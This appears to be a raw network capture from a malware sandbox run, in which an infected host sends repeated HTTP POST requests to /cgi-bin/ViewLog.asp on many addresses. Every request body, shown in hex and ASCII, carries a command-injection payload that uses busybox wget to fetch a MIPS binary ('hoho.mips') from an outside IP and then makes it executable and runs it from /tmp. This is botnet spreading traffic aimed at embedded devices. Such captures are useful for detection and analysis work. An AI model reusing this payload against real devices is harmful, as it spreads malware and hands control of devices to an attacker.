                                              Nov 23, 2023 05:17:14.755554914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.715168953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.634387970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.496898890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              368192.168.2.143799295.94.7.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.499177933 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.571796894 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              369192.168.2.144188894.120.153.368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.508416891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              370192.168.2.145602431.200.115.1198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.508451939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              371192.168.2.143569631.200.46.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.530946970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              372192.168.2.144086694.228.190.1098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.918225050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.108866930 CET430INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 05:09:04 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              373192.168.2.143909695.85.165.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.946265936 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              374192.168.2.145600462.141.38.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.952019930 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.254678965 CET480INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Thu, 23 Nov 2023 04:17:09 GMT
                                              Content-Type: text/html
                                              Content-Length: 253
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>cloudflare</center></body></html>
                                              Nov 23, 2023 05:17:09.869141102 CET480INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Thu, 23 Nov 2023 04:17:09 GMT
                                              Content-Type: text/html
                                              Content-Length: 253
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              375192.168.2.145245631.200.122.2368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:08.960985899 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              376192.168.2.144001294.66.24.1428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:09.517741919 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.214102983 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              377192.168.2.145985895.214.147.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:09.695180893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              378192.168.2.143384831.136.185.2018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:09.695249081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.707607031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:18.851483107 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:30.882910013 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.969825029 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              379192.168.2.143697694.16.121.478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:09.697928905 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:09.890125036 CET311INHTTP/1.1 400 Bad Request
